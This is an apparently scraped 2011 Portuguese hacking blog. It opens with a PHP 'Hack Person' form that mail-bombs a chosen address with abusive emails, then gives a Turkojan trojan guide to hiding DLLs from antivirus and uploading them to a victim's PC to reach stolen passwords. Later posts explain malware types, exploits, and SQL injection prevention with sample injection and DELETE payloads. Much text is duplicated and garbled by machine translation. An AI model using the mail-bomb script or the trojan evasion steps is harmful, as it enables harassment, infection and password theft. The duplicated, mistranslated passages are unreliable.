<?php
//Copy Righted Waffles./scheols
$hackedemail = $_POST['emailhacked'];
if(isset($_POST['hack'])){
$hack = 1;
$user = "FUCKEN GOT HACKED ROTFL";
while($hack <= 10){
mail($hackedemail,"Hacked","Fucken Got Pwned", "From: " ."Got Hacked. - ". $user. "<" . $hackedemail . ">\n");
echo "Hacked";
$hack++;
}
}elseif(!isset($_POST['hack'])){
?>
<form method='post'>
<input type='text' name='emailhacked'><br>
<input type='submit' name='hack' value='Hack Person'>
</form>
<? } ?>
segunda-feira, 31 de outubro de 2011
sábado, 29 de outubro de 2011
[Download] XCode SQLi/LFI/XSS and Webshell Scanning
---------------------------------
NeoInvasorHacker@gmail.com
http://twitter.com/#!/NeoInvasor
www.jewelofchaos.com
corp-antisech.blogspot.com
[ Dica ] Engenharia Com o Turkojan
Essa engenharia , serve para quem não consegue passar as dll na descompactação do server ( senha , browser etc...)
Geralmente o turkojan ( mesmo estando indetectável) descompacta uma dll na ativação no pc da vítima , onde o av detecta e exclui , vc até conecta , mas não tem acesso as senhas , pois ele descompacta outra dll ....etc
como resolver isso ?
Seguinte : Crie o server normalmente , não empacotem no upx , abram o server no resource hacker , exclua todas as opções , exceto DENEME E PACKAGEINFO
Em packageinfo , troque o conteúdo , por exemplo , coloque o packageinfo de outro programa pequeno , e salve . ( Não é obrigatório , mas ajuda a deixar indetectavel e diminui o tamanho )
Deixe indetectavel , cada um a sua maneira , use um cripter e um empacotador .
Em uma máquina virtual , instale o server no desktop , observe a dll que será descompactada .
Conecte e busque as senhas , observe que gera outra dll.
Agora , copie essas dual dll , e as deixem indetectável , usem um empacotador , ou cripter .
Agora , ao infectar a vitima , o av vai detectar a dll e excluir , mas vcs teram acesso ao pc , porem com funções limitadas , pois bem , façam o upload das dll editadas para mesma pasta onde está instalado o server e pronto.
Terão acesso as senhas e todas as funções do trojam , uma vez que ele não descompactará a mesma dll já contida na pasta
Caso queiram infectar alguem já infectado com outro trojam, façam primeiro o upload das dll , depois do trojam , pra não levantar suspeita.
espero ter ajudado ...
Ae galera ...caso não consigam visualizar as dll
http://www.4shared.c...http://www.4shared.com/file/E_BIJ2YI/dll_turko.html
Créditos a : //M3N3G@TT1:
Geralmente o turkojan ( mesmo estando indetectável) descompacta uma dll na ativação no pc da vítima , onde o av detecta e exclui , vc até conecta , mas não tem acesso as senhas , pois ele descompacta outra dll ....etc
como resolver isso ?
Seguinte : Crie o server normalmente , não empacotem no upx , abram o server no resource hacker , exclua todas as opções , exceto DENEME E PACKAGEINFO
Em packageinfo , troque o conteúdo , por exemplo , coloque o packageinfo de outro programa pequeno , e salve . ( Não é obrigatório , mas ajuda a deixar indetectavel e diminui o tamanho )
Deixe indetectavel , cada um a sua maneira , use um cripter e um empacotador .
Em uma máquina virtual , instale o server no desktop , observe a dll que será descompactada .
Conecte e busque as senhas , observe que gera outra dll.
Agora , copie essas dual dll , e as deixem indetectável , usem um empacotador , ou cripter .
Agora , ao infectar a vitima , o av vai detectar a dll e excluir , mas vcs teram acesso ao pc , porem com funções limitadas , pois bem , façam o upload das dll editadas para mesma pasta onde está instalado o server e pronto.
Terão acesso as senhas e todas as funções do trojam , uma vez que ele não descompactará a mesma dll já contida na pasta
Caso queiram infectar alguem já infectado com outro trojam, façam primeiro o upload das dll , depois do trojam , pra não levantar suspeita.
espero ter ajudado ...
Ae galera ...caso não consigam visualizar as dll
http://www.4shared.c...http://www.4shared.com/file/E_BIJ2YI/dll_turko.html
Créditos a : //M3N3G@TT1:
quinta-feira, 27 de outubro de 2011
O que é um Malware ?
Falando um pouco sobre malware.
Malware é um termo genérico de um software ruim ou malvado. O Malware é uma abreviação para o programa de computador tratado como “Software Malicioso”, esse malware é composto por uma programação que tenha: códigos, scripts de conteúdos ativos e outros softwares, que é projetado para interromper ou negar a operação e coletar informações dos usuários que leva a perda da segurança da informação e privacidade obtendo acesso não autorizado do recurso do sistema e outros comportamentos abusivos. Existem diferentes tipos de malware, abaixou vou explicar alguns desses famosos.
Vírus de computador:
Um vírus de computador é um programa que se reproduz. Pode anexar a outros programas, pode criar cópias de si mesmo (como um vírus companheiro). Isso pode danificar ou corromper os dados, fazer alteração de dados ou acabar com o desempenho do seu sistema, utilizando recursos como memória ou espaço em disco.
Worms:
Os Worms de computador são programas que se reproduzem ao executar de forma independente e navegar por todas as conexões de rede. A principal diferença entre um vírus e worms é a maneira pela qual ela se reproduz e se espalha. Um vírus é dependente do arquivo host ou setor de boot, e a transferência de arquivos entre computadores a se espalhar, enquanto que um worms de computador pode executar de forma completamente independente e se espalhar por sua própria vontade através de conexões de redes.
Trojan:
Trojan é um programa de código malicioso que é usado para acesso remoto ao computador de destino e ataca usando acesso não autorizado ao computador alvo ou vítima e causa danos ao sistema. Trojan é um pequeno código escondido dentro de um programa que é por isso que facilmente entra sistema sem conhecimento do usuário de computador.
Um vírus de computador é um programa que se reproduz. Pode anexar a outros programas, pode criar cópias de si mesmo (como um vírus companheiro). Isso pode danificar ou corromper os dados, fazer alteração de dados ou acabar com o desempenho do seu sistema, utilizando recursos como memória ou espaço em disco.
Worms:
Os Worms de computador são programas que se reproduzem ao executar de forma independente e navegar por todas as conexões de rede. A principal diferença entre um vírus e worms é a maneira pela qual ela se reproduz e se espalha. Um vírus é dependente do arquivo host ou setor de boot, e a transferência de arquivos entre computadores a se espalhar, enquanto que um worms de computador pode executar de forma completamente independente e se espalhar por sua própria vontade através de conexões de redes.
Trojan:
Trojan é um programa de código malicioso que é usado para acesso remoto ao computador de destino e ataca usando acesso não autorizado ao computador alvo ou vítima e causa danos ao sistema. Trojan é um pequeno código escondido dentro de um programa que é por isso que facilmente entra sistema sem conhecimento do usuário de computador.
Spyware:
O Spyware são programas, cookies, ou entradas do Registro que controlam sua atividade e enviar os dados para fora onde esse alguém recolhe esses dados para seus próprios propósitos geralmente para enviar SPAM, Virus, etc. Essas pessoas são maioria empresas de marketing a tentar recolher informações para ajudá-los a vender melhor.
O Spyware são programas, cookies, ou entradas do Registro que controlam sua atividade e enviar os dados para fora onde esse alguém recolhe esses dados para seus próprios propósitos geralmente para enviar SPAM, Virus, etc. Essas pessoas são maioria empresas de marketing a tentar recolher informações para ajudá-los a vender melhor.
Spyware é normalmente instalado em silêncio, ou mesmo em segredo, quando você instalar aplicações shareware, um exemplo bem simples é as chamadas toolbars que são instaladas com algum software grátis, no fundo tem um proposito por isso nunca instale uma toolbar.
Muitas pessoas acham que o Spyware é uma violação da sua privacidade.
Adware:
Adware é um parente próximo do Spyware. Adware é um software que é instalado no seu computador para mostrar-lhe adversidade ou propagandas. Adware podem retardar seu PC usando RAM e ciclos de CPU. Adware também pode retardar sua conexão com a Internet usando a largura de banda para recuperar anúncios publicitários. Adware podem aumentar a instabilidade do seu sistema, porque muitos pedidos de Adware não são programados.
Além disso, Adware podem irritar você em enormes quantidades de lixo visual reduzindo seu tempo com pop-up anúncios indesejados em sua tela, que requerem que você feche antes de poder voltar a usar seu PC, se estiver enfrentando esse problema peço que entrem em contato com o seu técnico pessoal para que faça um limpeza em seu computador.
Back Doors (Porta dos fundos):
Os Backdoors são praticamente os mesmos tipos de trojans ou worms, exceto que eles fazem algo diferente: eles abrem uma "backdoor" em um computador, fornecendo uma conexão de rede para hackers onde muitos deles utilizam para instalar vírus, mandar spam, fazer a instalação de arquivos maliciosos, isso significa que o seu sistema está invulnerável. Para se proteger de um Backdoors no seu computador pessoal, recomendo a instalação de um firewall eficaz e de Ids, onde eles são facilmente identificados pelos ids e serão impedidos de atuar no sistema bloqueando pelo firewall.
Adware é um parente próximo do Spyware. Adware é um software que é instalado no seu computador para mostrar-lhe adversidade ou propagandas. Adware podem retardar seu PC usando RAM e ciclos de CPU. Adware também pode retardar sua conexão com a Internet usando a largura de banda para recuperar anúncios publicitários. Adware podem aumentar a instabilidade do seu sistema, porque muitos pedidos de Adware não são programados.
Além disso, Adware podem irritar você em enormes quantidades de lixo visual reduzindo seu tempo com pop-up anúncios indesejados em sua tela, que requerem que você feche antes de poder voltar a usar seu PC, se estiver enfrentando esse problema peço que entrem em contato com o seu técnico pessoal para que faça um limpeza em seu computador.
Back Doors (Porta dos fundos):
Os Backdoors são praticamente os mesmos tipos de trojans ou worms, exceto que eles fazem algo diferente: eles abrem uma "backdoor" em um computador, fornecendo uma conexão de rede para hackers onde muitos deles utilizam para instalar vírus, mandar spam, fazer a instalação de arquivos maliciosos, isso significa que o seu sistema está invulnerável. Para se proteger de um Backdoors no seu computador pessoal, recomendo a instalação de um firewall eficaz e de Ids, onde eles são facilmente identificados pelos ids e serão impedidos de atuar no sistema bloqueando pelo firewall.
Root Kits (Kit de Ferramentas):
Rootkits é uma coleção de ferramentas (programas) que permitem o acesso de nível de administrador a um computador ou rede de computador. Tipicamente, um cracker instala um kit na raiz de um computador após a primeira aquisição do acesso em nível de usuário, ou por explorar uma vulnerabilidade conhecida ou cracking de uma senha. Uma vez que o kit raiz é instalado, ele permite que mascarar o ataque invadindo obtendo acesso através do kit raiz com acesso privilegiado ao computador e possivelmente, outras máquinas na sua Rede Interligadas. O Rootkits pode consistir de programas espiões e outros programas que: monitora o tráfego e teclas também pode criar um "backdoor" no sistema para o cracker, pois o sua principal função é camuflar impedindo que o código seja encontrado por um antivírus.
Eles escondem sua presença no sistema, fazendo uma camuflagem das suas chaves no registro e escondendo os seus processos no gerenciador de tarefas além de retornar somente “Arquivos Inexistentes” ao tentar acessar os arquivos relacionados.
Key loggers:
Um key logger é tipo de spyware onde se usa um dispositivo de hardware ou um software que registra a atividade em tempo real de um usuário de computador, incluindo as teclas do teclado que são pressionadas, e é muito utilizado por empresas onde usam esses tipos de sistema para monitorar os seus funcionários que fazem em suas maquinas porem em muitos casos as pessoas utilizam o programa de forma mal-intencionada. Existem softwares apropriados para se defender deste tipo de ameaça, sempre quando um computador estiver conectado a internet deixe ele protegido por um software como antisyware, firewall ou antivírus.
Injetores de URL (URL Inject):
Este software "injeta" uma URL que será representada no lugar de certas URLs quando você tentar visitá-las no seu browser (navegador). Normalmente, o URL Inject é uma ligação da filial para a URL alvo. Uma ligação da filial é um link especial usado para rastrear o tráfego de uma filial (Anúncios) enviou para o site original, para que o site original pode pagar comissões sobre todas as vendas desse tráfego.
Key loggers:
Um key logger é tipo de spyware onde se usa um dispositivo de hardware ou um software que registra a atividade em tempo real de um usuário de computador, incluindo as teclas do teclado que são pressionadas, e é muito utilizado por empresas onde usam esses tipos de sistema para monitorar os seus funcionários que fazem em suas maquinas porem em muitos casos as pessoas utilizam o programa de forma mal-intencionada. Existem softwares apropriados para se defender deste tipo de ameaça, sempre quando um computador estiver conectado a internet deixe ele protegido por um software como antisyware, firewall ou antivírus.
Injetores de URL (URL Inject):
Este software "injeta" uma URL que será representada no lugar de certas URLs quando você tentar visitá-las no seu browser (navegador). Normalmente, o URL Inject é uma ligação da filial para a URL alvo. Uma ligação da filial é um link especial usado para rastrear o tráfego de uma filial (Anúncios) enviou para o site original, para que o site original pode pagar comissões sobre todas as vendas desse tráfego.
RestHacker
Crédito: NeoInvasor - V.D.S
---------------------------------------------------
@NeoInvasor
NeoInvasorHacker@gmail.com
Introdução Exploits
Introdução
Nos dias atuais são indiscutíveis os grandes benefícios obtidos por meio da interligação dos computadores em uma única e grande rede acessível a partir de qualquer ponto do globo. A Internet, essa grande teia que une milhões de computadores em torno do mundo, é uma conquista irreversível que admite um único futuro: uma contínua e frequente expansão.
Entretanto, com o advento dessa incrível interconexão de máquinas em escala mundial, muitos ainda são os problemas que precisam ser resolvidos para que os usuários obtenham uma razoável segurança na utilização dos serviços disponibilizados na grande rede.
Cada novo serviço ou funcionalidade implementada pelos fabricantes de softwares utilizados nas redes de computadores encontra, frequentemente, uma imediata resposta de hackers e crackers. Esses “usuários” utilizam seus conhecimentos avançados de programação de computadores para explorar falhas existentes nos códigos desenvolvidos para essas novas funcionalidades. Esse é um problema do qual ninguém está totalmente livre. Conforme (FIREWALLS SECURITY CORPORATION) , até mesmo programas famosos e considerados seguros já foram lançados no mercado com esse tipo de vulnerabilidade.
Essas investidas contra fraquezas nos sistemas operacionais e aplicativos são apoiadas por ferramentas conhecidas como exploits. O resultado desses ataques pode ser simplesmente uma momentânea indisponibilidade do serviço (DOS – Denial Of Service) ou, na pior situação, a abertura de um acesso privilegiado no computador hospedeiro do serviço que sofreu o ataque. A partir desse acesso obtido, poderão ser provocados prejuízos imprevisíveis dentro da rede atacada.
Este trabalho procura descrever como funcionam e quais os resultados do ataque desses exploits. O objetivo do trabalho é dar subsídios aos administradores de rede e desenvolvedores de aplicativos na difícil tarefa de tentar evitar ou, pelo menos, responder o mais rápido possível a ataques desse tipo.[/size]
O que são exploits
O termo exploit, que em português significa, literalmente, explorar, na linguagem da Internet é usado comumente para se refererir a pequenos códigos de programas desenvolvidos especialmente para explorar falhas introduzidas em aplicativos por erros involuntários de programação.
Esses exploits, que podem ser preparados para atacar um sistema local ou remotamente, variam muito quanto à sua forma e poder de ataque. Pelo fato de serem peças de código especialmente preparadas para explorar falhas muito específicas, geralmente há um diferente exploit para cada tipo de aplicativo, para cada tipo de falha ou para cada tipo de sistema operacional.
Os exploits podem existir como programas executáveis ou, quando usados remotamente, podem estar ocultos, por exemplo, dentro de uma mensagem de correio eletrônico ou dentro de determinado comando de um protocolo de rede.
Como funcionam os exploits
Os exploits quase sempre se aproveitam de uma falha conhecida como buffer overflow (estouro de buffer).
O buffer overflow acontece quando um programa grava informação em uma certa variável, passando, porém, uma quantidade maior de dados do que estava previsto pelo programa. Essa situação possibilita que um código arbitrário seja executado, necessitando apenas que este seja devidamente posicionado dentro da área de memória do processo.
Créditos: Alex
Nos dias atuais são indiscutíveis os grandes benefícios obtidos por meio da interligação dos computadores em uma única e grande rede acessível a partir de qualquer ponto do globo. A Internet, essa grande teia que une milhões de computadores em torno do mundo, é uma conquista irreversível que admite um único futuro: uma contínua e frequente expansão.
Entretanto, com o advento dessa incrível interconexão de máquinas em escala mundial, muitos ainda são os problemas que precisam ser resolvidos para que os usuários obtenham uma razoável segurança na utilização dos serviços disponibilizados na grande rede.
Cada novo serviço ou funcionalidade implementada pelos fabricantes de softwares utilizados nas redes de computadores encontra, frequentemente, uma imediata resposta de hackers e crackers. Esses “usuários” utilizam seus conhecimentos avançados de programação de computadores para explorar falhas existentes nos códigos desenvolvidos para essas novas funcionalidades. Esse é um problema do qual ninguém está totalmente livre. Conforme (FIREWALLS SECURITY CORPORATION) , até mesmo programas famosos e considerados seguros já foram lançados no mercado com esse tipo de vulnerabilidade.
Essas investidas contra fraquezas nos sistemas operacionais e aplicativos são apoiadas por ferramentas conhecidas como exploits. O resultado desses ataques pode ser simplesmente uma momentânea indisponibilidade do serviço (DOS – Denial Of Service) ou, na pior situação, a abertura de um acesso privilegiado no computador hospedeiro do serviço que sofreu o ataque. A partir desse acesso obtido, poderão ser provocados prejuízos imprevisíveis dentro da rede atacada.
Este trabalho procura descrever como funcionam e quais os resultados do ataque desses exploits. O objetivo do trabalho é dar subsídios aos administradores de rede e desenvolvedores de aplicativos na difícil tarefa de tentar evitar ou, pelo menos, responder o mais rápido possível a ataques desse tipo.[/size]
O que são exploits
O termo exploit, que em português significa, literalmente, explorar, na linguagem da Internet é usado comumente para se refererir a pequenos códigos de programas desenvolvidos especialmente para explorar falhas introduzidas em aplicativos por erros involuntários de programação.
Esses exploits, que podem ser preparados para atacar um sistema local ou remotamente, variam muito quanto à sua forma e poder de ataque. Pelo fato de serem peças de código especialmente preparadas para explorar falhas muito específicas, geralmente há um diferente exploit para cada tipo de aplicativo, para cada tipo de falha ou para cada tipo de sistema operacional.
Os exploits podem existir como programas executáveis ou, quando usados remotamente, podem estar ocultos, por exemplo, dentro de uma mensagem de correio eletrônico ou dentro de determinado comando de um protocolo de rede.
Como funcionam os exploits
Os exploits quase sempre se aproveitam de uma falha conhecida como buffer overflow (estouro de buffer).
O buffer overflow acontece quando um programa grava informação em uma certa variável, passando, porém, uma quantidade maior de dados do que estava previsto pelo programa. Essa situação possibilita que um código arbitrário seja executado, necessitando apenas que este seja devidamente posicionado dentro da área de memória do processo.
Créditos: Alex
MySQL - SQL Injection Prevenção
Se você já tomou a entrada do usuário-primas e inseriu-a em um banco de dados MySQL há uma chance que você deixou-se aberta para um problema de segurança conhecido como SQL Injection. This lesson will teach you how to help prevent this from happening and help you secure your scripts and MySQL statements. Esta lição irá ensiná-lo para ajudar a impedir que isto aconteça e ajudá-lo a proteger seus scripts e declarações MySQL.
O que é SQL Injection
Injeção de SQL se refere ao ato de alguém inserir uma declaração MySQL para ser executado em seu banco de dados sem o seu conhecimento. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database. Injeção geralmente ocorre quando você perguntar a um usuário para entrada, como seu nome, e em vez de um nome que eles dão-lhe uma declaração MySQL que você vai saber executar no seu banco de dados.
SQL Injection Exemplo
Abaixo está uma seqüência de amostra que foi recolhida a partir de um usuário normal e um usuário mal tentando usar SQL Injection. We asked the users for their login, which will be used to run a SELECT statement to get their information. Pedimos aos usuários para seu login, que será usado para executar uma instrução SELECT para obter suas informações.
MySQL e PHP Código:
Display:
A consulta normal é nenhum problema, como a nossa declaração de MySQL só irá selecionar tudo de clientes que tem um nome de usuário igual a timmy.
However , the injection attack has actually made our query behave differently than we intended. No entanto, o ataque de injeção fez realmente a nossa consulta se comportar diferentemente do que pretendíamos. By using a single quote (') they have ended the string part of our MySQL query Usando aspas simples (') que tenham acabado a parte da cadeia de nossa consulta MySQL
* username = ' ' username = '"
and then added on to our WHERE statement with an OR clause of 1 (always true). e depois adicionada à nossa declaração WHERE com uma cláusula OR de 1 (sempre é verdade).
* username = ' ' OR 1 username = 'OR 1
This OR clause of 1 will always be true and so every single entry in the "customers" table would be selected by this statement! Esta cláusula OR de 1 será sempre verdadeira e por isso cada única entrada na "clientes" tabela seriam selecionados por esta declaração!
Mais graves ataques de SQL Injection
Embora o exemplo acima apresentado uma situação onde um atacante poderia ter acesso a muita informação que não deveriam ter, os ataques podem ser muito pior. For example an attacker could empty out a table by executing a DELETE statement. Por exemplo, um invasor poderia esvaziar uma tabela, executar uma instrução DELETE.
MySQL e PHP Código:
Display:
Se você fosse executar essa consulta, então a instrução DELETE injetado seria completamente vazio seus "clientes" da tabela. Now that you know this is a problem, how can you prevent it? Agora que você sabe que este é um problema, como você pode evitá-lo?
Prevenção de injeção - mysql_real_escape_string ()
Para sua sorte, este problema tem sido conhecida há algum tempo e PHP tem uma função especialmente feito para impedir esses ataques. All you need to do is use the mouthful of a function mysql_real_escape_string . Tudo que você precisa fazer é usar a boca de um mysql_real_escape_string função.
What mysql_real_escape_string does is take a string that is going to be used in a MySQL query and return the same string with all SQL Injection attempts safely escaped. O que mysql_real_escape_string faz é pegar uma string que vai ser usado em uma consulta MySQL e retornar a mesma seqüência com todos os SQL Injection tentativas ilesos. Basically, it will replace those troublesome quotes(') a user might enter with a MySQL-safe substitute, an escaped quote \'. Basicamente, ele irá substituir as aspas problemáticos (') o usuário pode entrar com um substituto MySQL-safe, uma citação escapou \'.
Lets try out this function on our two previous injection attacks and see how it works. Vamos tentar essa função em nossos dois ataques de injeção anterior e ver como ele funciona.
MySQL e PHP Código:
Display:
Note-se que essas citações foram mal escapou com a \ barra invertida, impedindo que o ataque de injeção. Now all these queries will do is try to find a username that is just completely ridiculous: Agora todas essas consultas vão fazer é tentar encontrar um nome de usuário que é apenas completamente ridículo:
* Bad: \' OR 1\' Bad: \ 'OR 1 \'
* Evil: \'; DELETE FROM customers WHERE 1 or username = \' Evil: \ '; DELETE FROM clientes WHERE 1 ou username = \'
And I don't think we have to worry about those silly usernames getting access to our MySQL database. E eu não acho que nós temos que se preocupar com os nomes de usuários bobagem ter acesso ao nosso banco de dados MySQL. So please do use the handy mysql_real_escape_string() function to help prevent SQL Injection attacks on your websites. Então, por favor use o mysql_real_escape_string útil () função para ajudar a prevenir ataques de SQL Injection em seus sites. You have no excuse not to use it after reading this lesson! Você não tem desculpa para não usá-lo depois de ler esta lição!
Créditos: Tizag
O que é SQL Injection
Injeção de SQL se refere ao ato de alguém inserir uma declaração MySQL para ser executado em seu banco de dados sem o seu conhecimento. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database. Injeção geralmente ocorre quando você perguntar a um usuário para entrada, como seu nome, e em vez de um nome que eles dão-lhe uma declaração MySQL que você vai saber executar no seu banco de dados.
SQL Injection Exemplo
Abaixo está uma seqüência de amostra que foi recolhida a partir de um usuário normal e um usuário mal tentando usar SQL Injection. We asked the users for their login, which will be used to run a SELECT statement to get their information. Pedimos aos usuários para seu login, que será usado para executar uma instrução SELECT para obter suas informações.
MySQL e PHP Código:
Quote
/ / Um nome de usuário boa
$name = "timmy"; $ Name = "timmy";
$query = "SELECT * FROM customers WHERE username = '$name'"; $ Query = "SELECT * FROM Clientes WHERE username = '$ name'";
echo "Normal: " . echo "Normal:". $query . $ Query. "<br />"; "<br />";
// user input that uses SQL Injection / Input / usuário que utiliza injeção de SQL
$name_bad = "' OR 1'" ; Name_bad $ = "'OR 1'";
// our MySQL query builder, however, not a very safe one / / O nosso construtor de consulta MySQL, no entanto, não uma muito seguro
$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'"; $ Query_bad = "SELECT * FROM Clientes WHERE username = '$ name_bad'";
// display what the new query will look like, with injection / / Mostrar o que a nova consulta será semelhante, com injeção
echo "Injection: " . echo "Injeção". $query_bad; $ Query_bad;
$name = "timmy"; $ Name = "timmy";
$query = "SELECT * FROM customers WHERE username = '$name'"; $ Query = "SELECT * FROM Clientes WHERE username = '$ name'";
echo "Normal: " . echo "Normal:". $query . $ Query. "<br />"; "<br />";
// user input that uses SQL Injection / Input / usuário que utiliza injeção de SQL
$name_bad = "' OR 1'" ; Name_bad $ = "'OR 1'";
// our MySQL query builder, however, not a very safe one / / O nosso construtor de consulta MySQL, no entanto, não uma muito seguro
$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'"; $ Query_bad = "SELECT * FROM Clientes WHERE username = '$ name_bad'";
// display what the new query will look like, with injection / / Mostrar o que a nova consulta será semelhante, com injeção
echo "Injection: " . echo "Injeção". $query_bad; $ Query_bad;
Display:
Quote
Normal: SELECT * FROM Clientes WHERE username = 'timmy'
Injection: SELECT * FROM customers WHERE username = '' OR 1'' Injecção: SELECT * FROM Clientes WHERE username =''OR 1''
Injection: SELECT * FROM customers WHERE username = '' OR 1'' Injecção: SELECT * FROM Clientes WHERE username =''OR 1''
A consulta normal é nenhum problema, como a nossa declaração de MySQL só irá selecionar tudo de clientes que tem um nome de usuário igual a timmy.
However , the injection attack has actually made our query behave differently than we intended. No entanto, o ataque de injeção fez realmente a nossa consulta se comportar diferentemente do que pretendíamos. By using a single quote (') they have ended the string part of our MySQL query Usando aspas simples (') que tenham acabado a parte da cadeia de nossa consulta MySQL
* username = ' ' username = '"
and then added on to our WHERE statement with an OR clause of 1 (always true). e depois adicionada à nossa declaração WHERE com uma cláusula OR de 1 (sempre é verdade).
* username = ' ' OR 1 username = 'OR 1
This OR clause of 1 will always be true and so every single entry in the "customers" table would be selected by this statement! Esta cláusula OR de 1 será sempre verdadeira e por isso cada única entrada na "clientes" tabela seriam selecionados por esta declaração!
Mais graves ataques de SQL Injection
Embora o exemplo acima apresentado uma situação onde um atacante poderia ter acesso a muita informação que não deveriam ter, os ataques podem ser muito pior. For example an attacker could empty out a table by executing a DELETE statement. Por exemplo, um invasor poderia esvaziar uma tabela, executar uma instrução DELETE.
MySQL e PHP Código:
Quote
Name_evil $ = ""; DELETE FROM clientes WHERE 1 ou username = '";
// our MySQL query builder really should check for injection / / O nosso construtor de consulta MySQL realmente deve verificar se há injeção
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'"; $ Query_evil = "SELECT * FROM Clientes WHERE username = '$ name_evil'";
// the new evil injection query would include a DELETE statement / / A consulta nova injeção mal iria incluir uma instrução DELETE
echo "Injection: " . echo "Injeção". $query_evil; $ Query_evil;
// our MySQL query builder really should check for injection / / O nosso construtor de consulta MySQL realmente deve verificar se há injeção
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'"; $ Query_evil = "SELECT * FROM Clientes WHERE username = '$ name_evil'";
// the new evil injection query would include a DELETE statement / / A consulta nova injeção mal iria incluir uma instrução DELETE
echo "Injection: " . echo "Injeção". $query_evil; $ Query_evil;
Display:
Quote
SELECT * FROM Clientes WHERE username = ''; DELETE FROM clientes WHERE 1 ou username = '"
Se você fosse executar essa consulta, então a instrução DELETE injetado seria completamente vazio seus "clientes" da tabela. Now that you know this is a problem, how can you prevent it? Agora que você sabe que este é um problema, como você pode evitá-lo?
Prevenção de injeção - mysql_real_escape_string ()
Para sua sorte, este problema tem sido conhecida há algum tempo e PHP tem uma função especialmente feito para impedir esses ataques. All you need to do is use the mouthful of a function mysql_real_escape_string . Tudo que você precisa fazer é usar a boca de um mysql_real_escape_string função.
What mysql_real_escape_string does is take a string that is going to be used in a MySQL query and return the same string with all SQL Injection attempts safely escaped. O que mysql_real_escape_string faz é pegar uma string que vai ser usado em uma consulta MySQL e retornar a mesma seqüência com todos os SQL Injection tentativas ilesos. Basically, it will replace those troublesome quotes(') a user might enter with a MySQL-safe substitute, an escaped quote \'. Basicamente, ele irá substituir as aspas problemáticos (') o usuário pode entrar com um substituto MySQL-safe, uma citação escapou \'.
Lets try out this function on our two previous injection attacks and see how it works. Vamos tentar essa função em nossos dois ataques de injeção anterior e ver como ele funciona.
MySQL e PHP Código:
Quote
/ / NOTA: você deve estar conectado ao banco de dados para usar esta função!
// connect to MySQL / / Conectar ao MySQL
$name_bad = "' OR 1'"; Name_bad $ = "'OR 1'";
$name_bad = mysql_real_escape_string($name_bad); $ Name_bad = mysql_real_escape_string ($ name_bad);
$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'"; $ Query_bad = "SELECT * FROM Clientes WHERE username = '$ name_bad'";
echo "Escaped Bad Injection: <br />" . echo "Escaped Injection Bad: <br />". $query_bad . $ Query_bad. "<br />"; "<br />";
$name_evil = "'; DELETE FROM customers WHERE 1 or username = '"; Name_evil $ = ""; DELETE FROM clientes WHERE 1 ou username = '";
$name_evil = mysql_real_escape_string($name_evil); $ Name_evil = mysql_real_escape_string ($ name_evil);
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'"; $ Query_evil = "SELECT * FROM Clientes WHERE username = '$ name_evil'";
echo "Escaped Evil Injection: <br />" . echo "Escaped Injection Evil: <br />". $query_evil; $ Query_evil;
// connect to MySQL / / Conectar ao MySQL
$name_bad = "' OR 1'"; Name_bad $ = "'OR 1'";
$name_bad = mysql_real_escape_string($name_bad); $ Name_bad = mysql_real_escape_string ($ name_bad);
$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'"; $ Query_bad = "SELECT * FROM Clientes WHERE username = '$ name_bad'";
echo "Escaped Bad Injection: <br />" . echo "Escaped Injection Bad: <br />". $query_bad . $ Query_bad. "<br />"; "<br />";
$name_evil = "'; DELETE FROM customers WHERE 1 or username = '"; Name_evil $ = ""; DELETE FROM clientes WHERE 1 ou username = '";
$name_evil = mysql_real_escape_string($name_evil); $ Name_evil = mysql_real_escape_string ($ name_evil);
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'"; $ Query_evil = "SELECT * FROM Clientes WHERE username = '$ name_evil'";
echo "Escaped Evil Injection: <br />" . echo "Escaped Injection Evil: <br />". $query_evil; $ Query_evil;
Display:
Quote
Escapou Injection Bad:
SELECT * FROM customers WHERE username = '\' OR 1\'' SELECT * FROM Clientes WHERE username = '\' OR 1 \''
Escaped Evil Injection: Escapou Injection Evil:
SELECT * FROM customers WHERE username = '\'; DELETE FROM customers WHERE 1 or username = \'' SELECT * FROM Clientes WHERE username = '\'; DELETE FROM clientes WHERE 1 ou username = \''
SELECT * FROM customers WHERE username = '\' OR 1\'' SELECT * FROM Clientes WHERE username = '\' OR 1 \''
Escaped Evil Injection: Escapou Injection Evil:
SELECT * FROM customers WHERE username = '\'; DELETE FROM customers WHERE 1 or username = \'' SELECT * FROM Clientes WHERE username = '\'; DELETE FROM clientes WHERE 1 ou username = \''
Note-se que essas citações foram mal escapou com a \ barra invertida, impedindo que o ataque de injeção. Now all these queries will do is try to find a username that is just completely ridiculous: Agora todas essas consultas vão fazer é tentar encontrar um nome de usuário que é apenas completamente ridículo:
* Bad: \' OR 1\' Bad: \ 'OR 1 \'
* Evil: \'; DELETE FROM customers WHERE 1 or username = \' Evil: \ '; DELETE FROM clientes WHERE 1 ou username = \'
And I don't think we have to worry about those silly usernames getting access to our MySQL database. E eu não acho que nós temos que se preocupar com os nomes de usuários bobagem ter acesso ao nosso banco de dados MySQL. So please do use the handy mysql_real_escape_string() function to help prevent SQL Injection attacks on your websites. Então, por favor use o mysql_real_escape_string útil () função para ajudar a prevenir ataques de SQL Injection em seus sites. You have no excuse not to use it after reading this lesson! Você não tem desculpa para não usá-lo depois de ler esta lição!
Créditos: Tizag
[Ebook] XSS Attacks
XSS Attacks - Cross Site Scripting Exploits & Defense
Download: http://www.4shared.com/document/HvuQ6adi/XSS_Attacks_-_Cross_Site_Scrip.html
Tamanho: 6 MB
Idioma: Ingles
Abra Ele Pelo Browse Do GoogleChrome e Mande Traduzir
Download: http://www.4shared.com/document/HvuQ6adi/XSS_Attacks_-_Cross_Site_Scrip.html
Tamanho: 6 MB
Idioma: Ingles
Abra Ele Pelo Browse Do GoogleChrome e Mande Traduzir
[Artigo] Pascal - Historia
Origem
